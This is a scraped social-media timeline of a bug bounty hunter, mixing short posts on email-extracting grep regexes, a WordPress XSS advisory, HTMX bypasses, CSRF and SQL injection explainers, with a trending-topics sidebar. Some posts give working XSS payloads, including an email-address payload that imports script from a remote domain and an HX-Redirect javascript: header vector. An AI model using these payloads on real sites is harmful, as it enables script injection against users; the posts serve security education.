✌️Z4Z4✌️
@z4z4_h1
Full-time Bug Bounty Hunter since 2020 🐞💻 | Exploring the digital wilderness for glitches & vulnerabilities. Passionate about cybersecurity, ethical hacking
Hey friends 👋 Exciting news! From now on, I'll be sharing my adventures in cybersecurity and bug bounty hunting right here. Expect tales from the digital frontier, tips, and maybe a few epic fails along the way. Let's dive into the world of #InfoSec together! 🛡️💻 #BugBounty
Here's a handy way to use grep to find emails in text: 🧡 grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b" file.txt or to look for a specific company email you can use: 🧡 grep -E -o "\b[A-Za-z0-9._%+-]+@\bbugcrowd.com" file.txt Check it out 👇
![Bugcrowd's tweet image. Here's a handy way to use grep to find emails in text:
🧡 grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b" file.txt
or to look for a specific company email you can use:
🧡 grep -E -o "\b[A-Za-z0-9._%+-]+@\bbugcrowd.com" file.txt
Check it out 👇](https://pbs.twimg.com/media/GNd5inXXIAAqmvC.jpg)
🚨Alert🚨CVE-2024-4439: Unauthenticated Stored Cross-Site Scripting Vulnerability in WordPress Core ⚠It can be exploited by both unauthenticated and authenticated users under varying circumstances and be leveraged to inject malicious web scripts into pages. 🤖Affected Versions:…
Talked a LOT about HTMX this week. So here's the TL;DR of the bypasses from the episode with @avlidienbrunn: 1. CSP Bypass 2. Client-side response header injection to XSS 3. Bypassing hx-disable 4. XSS-ing impossible elements
Andreas Konstantinides: Cybersecurity 101 - Κερδίστε το κορυφαίο βιβλίο κυβερνοασφάλειας #shorts #cybersecurity #cybersecurity2024
🔍 Hey, bug hunters! Ever tried slicing a big network into bite-sized pieces? Let's dive into how `mapcidr` makes this super easy! 🚀 Example time! We've got `136.122.0.0/16` and want to split it into smaller subnets, each with 2048 IPs. Just use `mapcidr -sbh 2048`, and bam!…
HTMX uses certain headers to help instruct the framework for certain behaviours. This can be abused via HX-Redirect: javascript:alert(1) for XSS if you can inject a response header. @avlidienbrunn explains how...
Understanding the Same-Origin Policy: A Friendly Guide for Bug Hunters 🕵️♂️ Hey there, tech enthusiasts and bug hunters! Have you ever stumbled upon the term "Same-Origin Policy" (SOP) while diving into the depths of web security? If it sounds a bit cryptic, don't worry! Let's…
🔥Exactly bro Exactly 👌
HackerOne CEO @martenmickos is retiring from HackerOne after 9 years of leadership. Read more here: bit.ly/4bBvqFl
Hey there, tech enthusiasts! 🌟 Let's dive into the tricky world of Cross-Site Request Forgery, or CSRF, a sneaky vulnerability that can trick a web browser into executing unwanted actions on a website where a user is logged in. 🕵️♂️ Ready to find out how to spot and…
XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required). "><img/src/onerror=import('//domain/')>"@yourdomain .com cc @BRuteLogic - brutelogic.com.br/blog/xss-limit…
From beer brewing to bug hunting! Check out @cinzinga_'s Hacker Spotlight! Cheers 🍻👇 loom.ly/NHukNG4
🔐 Unveiling SQL Injection: Discover the 3 Dangerous Types! 📬🕶📡 1. In-band SQLi In-band SQL Injection is the most straightforward and common form of SQLi. It's easy to detect and exploit because it involves using the same communication channel to launch the attack and gather…
🌐 Dive into the murky waters of SQL Injection (SQLi), a notorious vulnerability that can give attackers the keys to the database kingdom! 🗝 Learn the types and tactics: 📬 In-band SQLi: Direct data theft. 🕶 Blind SQLi: Stealthy and inferential. 📡 Out-of-band SQLi: Uses…
Hey there, fellow bug hunters! 🕵️♂️ Ready to level up your report writing skills? This tweet is all about crafting killer bug bounty reports that not only get noticed but also appreciated by program owners. Let’s dive in! 🚀 Writing a bug bounty report is like telling a story…
United States Trends
- 1. #GMMTV2026 937K posts
- 2. MILKLOVE BORN TO SHINE 175K posts
- 3. Good Tuesday 21.7K posts
- 4. #WWERaw 77.9K posts
- 5. TOP CALL 9,291 posts
- 6. AI Alert 8,094 posts
- 7. Moe Odum N/A
- 8. Brock 42K posts
- 9. Purdy 28.5K posts
- 10. Barcelona 144K posts
- 11. Check Analyze 2,413 posts
- 12. Bryce 21.3K posts
- 13. Token Signal 8,569 posts
- 14. Keegan Murray 1,556 posts
- 15. Dialyn 7,957 posts
- 16. Alan Dershowitz 2,804 posts
- 17. Market Focus 4,627 posts
- 18. Timberwolves 3,924 posts
- 19. Finch 14.7K posts
- 20. The Quickest 3,103 posts
Something went wrong.
Something went wrong.